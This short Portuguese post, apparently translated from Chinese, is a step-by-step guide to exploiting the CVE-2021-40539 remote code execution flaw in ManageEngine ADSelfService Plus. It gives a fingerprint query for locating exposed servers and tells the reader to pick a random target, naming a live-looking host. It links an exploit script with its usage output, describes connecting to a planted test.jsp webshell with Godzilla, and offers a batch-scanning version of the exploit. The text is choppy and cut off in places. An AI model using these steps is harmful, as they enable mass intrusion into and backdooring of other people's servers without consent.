
CVE-2021-40539: Vulnerabilidade RCE no ADSelfService Plus
CVE-2021-40539: Vulnerabilidade RCE no ADSelfService Plus
"ADSelfService" app="ZOHO-ManageEngine-ADSelfService" header="JSESSIONIDADSSP" //推荐
https://adself.66nao.com/ Passo 2: Encontre um alvo aleatório e use o script de detecção a seguir para testar a vulnerabilidade....
https://github.com/synacktiv/CVE-2021-40539/blob/main/exploit.py Modo de uso: C:\Users\26629\Desktop\CVE-2021-40539-main>python39 exploit.py usage: exploit.py [-h] -t TARGET [-w WEBSHELL] [-j JAVA_CLASS] [-s] exploit.py: error: the following arguments are required: -t/--target Passo 3: Use o Godzilla para se conectar e realize o teste de verificação.... C Copiar código 1 https://adself.66nao.com//help/admin-guide/test.jsp
A versão baixada do GitHub faz uma varredura individual. Fiz um desenvolvimento secundário nela, adicionando um módulo de varredura em lote com a opção -f. Todos podem baixar e usar.